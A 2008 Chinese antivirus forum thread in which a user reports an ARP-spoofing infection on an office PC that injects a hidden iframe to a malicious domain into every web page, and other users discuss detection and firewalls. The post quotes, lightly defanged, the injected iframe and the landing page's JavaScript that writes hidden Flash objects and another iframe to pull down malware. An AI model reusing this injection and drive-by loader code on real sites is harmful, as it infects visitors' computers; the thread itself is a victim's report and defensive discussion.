指向http://w.a92c.cn/logo.gif的病毒 红伞无动于衷。。。。

bigwang

在单位，最近这几天我发现ie7都常常连不上网页，老说是无法连接。。。之类的。。。。偶然能上网的时候，每打开ie，状态栏上就会在出现，比如在windows update的ie窗口，ie居然先跑去了这个地址，到这时，红伞才突然弹出好多窗口说好多病毒之类的，我看了，拦住的好像都不是可执行文件。。


我知道是病毒发作了，起码有arp攻击功能的病毒。。。但是我用红伞扫了一遍，发现不了。。不能上网还好，只能能上网，ie状态栏立即就出现“”字样 。。。。。然后又是报警弹窗口。。。。

我用了几个专杀arp病毒的工具，，，扫描后也是一无所获。。。卡卡、360一无所获

办公室的机器，xp sp3  系统补丁都是最新的。。。

一个星期了。。。。。极少数时间能上网，其他时间都难上网。。。我估计我所在的局域网里病毒大爆发。。。

这个病毒，红伞没反应。。。等到有反应。。。局域网里的网关主机地址好像都被换了。。。然后就不能上网了。。现在整个局域网搞得乱七八糟。。。今天我用arp -a命令看看，反馈的信息是空。。。。汗。。。也不知道是病毒造成的，还是网关正在修。。。从本机上看ip地址。。网络链接正常。。。。

系统恢复了好几次。。。最后都变成同样的结果： 。。。。然后警报。。。。病毒怎么传进来的？？红伞为什么没反应类？？？

==================================================
中毒症状： 

arp病毒症状。

病毒会在网页头部插入："<ifr ame src=http://%77%2E%61%39%32%63%2E%63%6E/logo.gif width=100 height=0></if rame> " 


因此，用IE随便打开一个网页都会跳出这个恶意地址。

而它其实是个网页：
内容如下： 
<SC RIPT LANGUAGE="javascript"> 
window.onerror=function(){return true;} 
fun ction init(){document.write();} 
wi ndow.onload = init; 
if(doc ument.cookie.indexOf("tyeyede=")==-1) 
{ 
var skp aopao=new Date(); 
var ex pires=new Date(); 
ex pires.setTime(expires.getTime()+24*60*60*1000); 
docu ment.cookie="tyeyede=Yes;path=/;expires="+expires.toGMTString(); 
if(navig ator.userAgent.toLowerCase().indexOf("msie")>0) 
{ 
docu ment.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" code base="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">'); 
docu ment.write('<param name="allowScriptAccess" value="sameDomain"/>'); 

docu ment.write('<param name="movie" value="ie.swf"/>'); 
docu ment.write('<param name="quality" value="high"/>'); 
docu ment.write('<param name="bgcolor" value="#ffffff"/>'); 
docu ment.write(''); 
docu ment.write('</object>'); 
} 
else 
{ 
docu ment.write("<em bed src=ff.swf width=0 height=0>"); 
} 
docu ment.writeln("<ifr ame src=next2.htm width=50 height=0><\/ifr ame>");} 
</SC RIPT> 
</BO DY></HT ML> 
<scr ipt type="text/java script" sr c="ht tp://js.tongji.cn.yahoo.com/745761/ystat.js"></sc ript><no script>< a h ref="ht tp://tongji.cn.yahoo.com"></ a></nos cript> 


会下载乱七八糟的东西到你的电脑。。。。到现在为止，红伞除了对最后最后下载的东西可能做出了拦截动作外，其他没有反应。。。

还有我在样本区，发现类似的logo.gif： http://bbs.kafan.cn/viewthread.php?tid=264556 次帖二楼也说红伞不报。

[ 本帖最后由 bigwang 于 2008-9-28 21:36 编辑 ]

末日逐沙

楼主太不幸了，深刻同情，其实不上h网才是根本所在

bigwang

原帖由 末日逐沙 于 2008-9-25 22:59 发表
楼主太不幸了，深刻同情，其实不上h网才是根本所在

和h网没关系。。

这台机器是公务机。没人敢用它上h网，因为有监控。。。

eyesineyes

ZoneAlarm防火墙自动拦截对h x x p:///w.a92c.cn/访问，列为Spy Site。

[ 本帖最后由 eyesineyes 于 2008-9-26 00:15 编辑 ]

08红伞威点

刚试～～显示：禁止访问

KFfoxstep

Directory Listing Denied
This Virtual Directory does not allow contents to be listed.

symphonia

我一点进来红伞就报毒。。。想害人啊？

被蒙蔽了的眼

原帖由 symphonia 于 2008-9-26 02:37 发表
我一点进来红伞就报毒。。。想害人啊？

报code

伞兵づ泡泡

杀毒软件对非本地ARP是没有办法的

这个时候需要防火墙

ndd200

外部ARP包，需要网络防火墙来防御。
不过最好的方法还是找出发送ARP欺骗的源机器。然后……痛扁那人一顿，小样，谁叫你乱上XX网……